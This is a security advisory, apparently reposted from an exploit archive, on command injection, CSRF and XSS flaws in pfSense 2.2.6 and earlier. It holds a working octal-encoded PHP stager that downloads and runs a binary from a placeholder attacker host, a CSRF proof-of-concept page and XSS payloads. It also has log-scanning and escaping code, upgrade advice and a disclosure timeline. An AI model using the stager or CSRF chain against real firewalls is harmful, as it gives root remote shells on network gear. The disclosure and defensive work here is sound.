
PfSense Community Edition 2.2.6 CSRF / XSS / Command Injection

Posted Apr 15, 2016
Authored by Francesco Oddo | Site security-assessment.com

PfSense Community Edition versions 2.2.6 and below suffer from cross site scripting, code injection, and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | a1cea41cda47aaf708576b8f7af2aa6b3c4f8bef37be1b6afc196e909188eabc

[security-assessment.com ASCII-art logo]

presents..

PfSense Community Edition Multiple Vulnerabilities
Affected versions: PfSense Community Edition <= 2.2.6

PDF:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

+-----------+
|Description|
+-----------+
The pfSense Community Edition firewall is affected by multiple
vulnerabilities: remote code execution via operating system command
injection by an authenticated non-administrative user (also reachable
through cross-site request forgery, since the vulnerable page accepts
plain GET requests), and stored and reflected cross-site scripting.

+------------+
|Exploitation|
+------------+
==Command Injection==
The status_rrd_graph_img.php page is vulnerable to command injection via
the graph GET parameter. An authenticated non-administrative user whose
privileges include the graph status functionality can inject arbitrary
operating system commands, which execute in the context of the root
user. Although the graph parameter is validated with a regular
expression filter, the pipe character is not removed. Octal character
sequences, decoded on the target by printf, can be used to encode the
payload so that the characters the filter rejects never appear in the
request; the decoded payload writes a PHP file that downloads and
executes a file (e.g. a reverse shell) from a remote attacker-controlled
host.

[Octal-encoded PHP Stager]
# Python 2 or 3. Each character of the stager is emitted as \\NNN: the
# extra backslash is consumed by /bin/sh when it tokenises the unquoted
# injected word, leaving \NNN for printf(1) to decode into the character.
stager = (
    'echo \'<?php $shell = file_get_contents("http://[ATTACKER_IP]/shell.elf");' +
    'file_put_contents("myshell.elf", $shell);' +
    'system("chmod 755 myshell.elf && ./myshell.elf"); ?> \' > shellexec'
)
encoded_stager = ''
for c in stager:
    encoded_stager += "\\\\%03o" % ord(c)   # three octal digits, e.g. 'a' -> \\141
print(encoded_stager)
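
To make the encoding and the filter bypass concrete, the following Python
script (an added example, not the advisory's own code and not pfSense's)
builds the graph parameter from the stager above, emulates the two decoding
steps that happen on the target (sh backslash handling of an unquoted word,
then printf's octal escapes) to confirm the payload round-trips, and contrasts
a strip-style blacklist with the allow-list check that would have rejected the
request. STAGER, the STRIP_FILTER character set (modelled on the advisory's
description, not pfSense 2.2.6's real regular expression) and the GRAPH_NAME
allow-list are assumptions.

```python
import re
import shlex

# [ATTACKER_IP] is the advisory's own placeholder and is left as-is.
STAGER = (
    'echo \'<?php $shell = file_get_contents("http://[ATTACKER_IP]/shell.elf");'
    'file_put_contents("myshell.elf", $shell);'
    'system("chmod 755 myshell.elf && ./myshell.elf"); ?> \' > shellexec'
)


def octal_encode(text):
    """Encode every character as \\\\NNN (two backslashes, three octal digits).

    The doubled backslash is deliberate: the injected word is unquoted when
    /bin/sh tokenises the command line, so sh consumes one backslash and
    printf(1) receives \\NNN, which it decodes back into the character.
    """
    return "".join("\\\\%03o" % ord(c) for c in text)


def build_graph_param(stager):
    """Value of the 'graph' GET parameter used by the advisory's first request."""
    return "file|printf %s|sh|echo " % octal_encode(stager)


def shell_then_printf(word):
    """Emulate the two decoding steps on the target.

    1. sh backslash handling of an unquoted word (shlex in POSIX mode treats
       backslashes the same way): '\\\\141' -> '\\141'.
    2. printf(1) octal escapes: '\\141' -> 'a'.
    """
    unquoted = shlex.split(word)[0]
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), unquoted)


# Hypothetical strip-style filter: shell metacharacters removed, the pipe
# and the backslash left alone.  Modelled on the advisory's description only;
# it is NOT the regular expression pfSense 2.2.6 actually used.
STRIP_FILTER = re.compile(r"""[;&'"`<>(){}$\n]""")


def survives_strip_filter(param):
    """True if the filter would leave the parameter unchanged."""
    return STRIP_FILTER.sub("", param) == param


# Hardened check (assumed): an allow-list that admits only plausible graph
# names, so pipes, spaces and backslashes are rejected before any shell runs.
GRAPH_NAME = re.compile(r"^[A-Za-z0-9_-]+$")


def accept_graph(param):
    """True only for a bare graph name."""
    return GRAPH_NAME.match(param) is not None


if __name__ == "__main__":
    param = build_graph_param(STAGER)
    print("graph=" + param)
    print("round-trip ok:", shell_then_printf(octal_encode(STAGER)) == STAGER)
    print("passes strip filter:", survives_strip_filter(param))
    print("passes allow-list:", accept_graph(param))
```

The encoded word contains only backslashes and digits, which is why no
character blacklist can catch it; the allow-list rejects it on the first pipe.
The shlex emulation only models an unquoted word, which is the case the
advisory describes.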

[CSRF POC]
<!-- Two GET requests to the vulnerable page, sent by the victim's browser
     with the victim's session cookie attached:
     1. printf decodes the octal stager and sh runs it, writing a file
        named "shellexec" that contains the PHP stager;
     2. the form submission runs "php shellexec", which fetches and
        executes the attacker's binary. -->
<html>
<head>
<script>
function sploit() {
  // [ENCODED_STAGER] is the output of the encoder above.
  var query = "database=-throughput.rrd&graph=file|printf [ENCODED_STAGER]|sh|echo ";
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://<target>/status_rrd_graph_img.php?" + query, true);
  xhr.withCredentials = true;
  xhr.send();

  // Give the first request time to write the file before executing it.
  setTimeout(shellexec, 2000);
}

function shellexec() {
  document.csrf_exploit_exec.submit();
}
</script>
</head>
<body onload="sploit();">
<form name="csrf_exploit_exec" action="https://<target>/status_rrd_graph_img.php">
  <input type="hidden" name="database" value="-throughput.rrd" />
  <input type="hidden" name="graph" value="file|php shellexec|echo " />
</form>
</body>
</html>
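
For anyone hunting this in a webGUI access log, the following Python script
(an added example, not from the advisory) scans combined-log-format lines for
requests to status_rrd_graph_img.php whose graph parameter is not a plain
graph name, and decodes any \\NNN octal groups so the injected command is
readable to an analyst. The log lines, client addresses and log format are
constructed, not taken from a real pfSense installation; the rule is the
point, not the format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-log-format lines.  Line 2 carries an octal-encoded
# stager shortened to the word "echo"; line 3 is the follow-up request that
# runs the dropped PHP file.  None of this is from a real system.
ACCESS_LOG = [
    '192.0.2.10 - - [15/Apr/2016:10:00:01 +0000] "GET /status_rrd_graph_img.php'
    '?database=wan-traffic.rrd&graph=inpass HTTP/1.1" 200 5120',
    '192.0.2.10 - - [15/Apr/2016:10:00:07 +0000] "GET /status_rrd_graph_img.php'
    '?database=-throughput.rrd&graph=file%7Cprintf%20%5C%5C145%5C%5C143%5C%5C150'
    '%5C%5C157%7Csh%7Cecho%20 HTTP/1.1" 200 0',
    '192.0.2.10 - - [15/Apr/2016:10:00:09 +0000] "GET /status_rrd_graph_img.php'
    '?database=-throughput.rrd&graph=file%7Cphp%20shellexec%7Cecho%20 HTTP/1.1" 200 0',
    '192.0.2.11 - - [15/Apr/2016:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 10240',
]

REQUEST_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/'
)
# What a legitimate graph parameter looks like (assumed allow-list).
GRAPH_NAME = re.compile(r"^[A-Za-z0-9_-]*$")
# Two backslashes followed by three octal digits, as emitted by the stager encoder.
OCTAL_SEQ = re.compile(r"\\\\([0-7]{3})")


def reveal_octal(value):
    """Turn each \\\\NNN group back into its character so the command is readable."""
    return OCTAL_SEQ.sub(lambda m: chr(int(m.group(1), 8)), value)


def scan(lines):
    """Return one finding per request whose graph parameter is not a bare name."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/status_rrd_graph_img.php"):
            continue
        # parse_qs percent-decodes, so raw and %-encoded pipes are handled alike.
        for graph in parse_qs(url.query, keep_blank_values=True).get("graph", []):
            if GRAPH_NAME.match(graph):
                continue
            findings.append({
                "client": m.group("client"),
                "graph": graph,
                "decoded": reveal_octal(graph),
            })
    return findings


if __name__ == "__main__":
    for f in scan(ACCESS_LOG):
        print("%s graph=%r -> %r" % (f["client"], f["graph"], f["decoded"]))
```

Browsers may send the pipe character raw or percent-encoded; the query
string is decoded before the allow-list is applied, so either form is caught.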

==Cross-site Scripting==
Multiple stored and reflected cross-site scripting vulnerabilities exist
in the web interface of the application. An authenticated attacker with
limited privileges can run arbitrary JavaScript in the context of an
administrative user's session and so extend their access to
administrative areas of the application (e.g. the command prompt
functionality).

Param => descr
Method => POST
URL => /system_gateways_edit.php
Payload => <script>alert(1)</script>
Render => /system_gateways_groups_edit.php
Type => Stored

Param => container
Method => POST
URL => /firewall_shaper_layer7.php
Payload => "><script>alert(1)</script>
Render => /firewall_shaper_layer7.php
Type => Reflected

Param => newname
Method => POST
URL => /firewall_shaper_vinterface.php
Payload => "><script>alert(1)</script>
Render => /firewall_shaper_vinterface.php
Type => Reflected
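
The three entries above are one bug in two output contexts: a value
rendered as page text (descr) and a value echoed into an attribute (container,
newname). The following Python script (an added example, not the advisory's
code and not pfSense's markup) renders the advisory's payloads through a
constructed template three ways, unescaped, with only the angle brackets
encoded, and with quotes encoded too, and uses the standard-library HTML
parser to count script elements and on* event-handler attributes. It goes
beyond the page's payloads with one constructed attribute-only payload
(ATTR_BREAKOUT) to show why encoding angle brackets alone is not enough in
attribute context.

```python
import html
from html.parser import HTMLParser

# Constructed stand-ins for the two output contexts the advisory lists; this
# is not pfSense's markup.
TEMPLATE = (
    '<table><tr><td>{descr}</td></tr></table>\n'
    '<input type="text" name="container" value="{container}">'
)

# Payloads from the advisory (text-node and attribute-value contexts).
PAGE_PAYLOADS = ("<script>alert(1)</script>", '"><script>alert(1)</script>')
# Constructed attribute-only payload with no angle brackets at all.
ATTR_BREAKOUT = '" autofocus onfocus="alert(1)'


def render_vulnerable(descr, container):
    """Values copied into the markup untouched."""
    return TEMPLATE.format(descr=descr, container=container)


def render_half_fixed(descr, container):
    """Only & < > are entity-encoded; quotes pass through (quote=False)."""
    return TEMPLATE.format(descr=html.escape(descr, quote=False),
                           container=html.escape(container, quote=False))


def render_fixed(descr, container):
    """Quotes encoded as well (quote=True), so an attribute value cannot be closed early."""
    return TEMPLATE.format(descr=html.escape(descr, quote=True),
                           container=html.escape(container, quote=True))


class ScriptFinder(HTMLParser):
    """Count <script> elements and collect on* event-handler attribute names."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def find_scripts(markup):
    """Return (number of script elements, list of event-handler attribute names)."""
    finder = ScriptFinder()
    finder.feed(markup)
    finder.close()
    return finder.scripts, finder.handlers


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("half-fixed", render_half_fixed),
                         ("fixed", render_fixed)):
        print(name, find_scripts(render(*PAGE_PAYLOADS)),
              find_scripts(render("x", ATTR_BREAKOUT)))
```

The advisory's attribute payload needs a `<` to open a script tag, so
encoding angle brackets alone appears to stop it; the constructed payload
closes the attribute with a bare quote and adds an event handler, which only
quote encoding prevents. Escaping must match the output context.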


+----------+
| Solution |
+----------+
Upgrade to pfSense 2.3. This may be performed in the web interface or
from the console.

+------------+
| Timeline |
+------------+
10/02/2016 – Initial disclosure to pfSense.
11/02/2016 – Vendor confirms receipt of advisory and provides fixes.
16/02/2016 – Sent follow-up email about public release.
16/02/2016 – Vendor requests advisory disclosure after release of new software build.
12/04/2016 – Release of patched software build and vendor disclosure of security advisories.
15/04/2016 – Public disclosure of security advisory.

+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

+------------+
| References |
+------------+
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
https://www.pfsense.org/security/advisories/pfSense-SA-16_02.webgui.asc


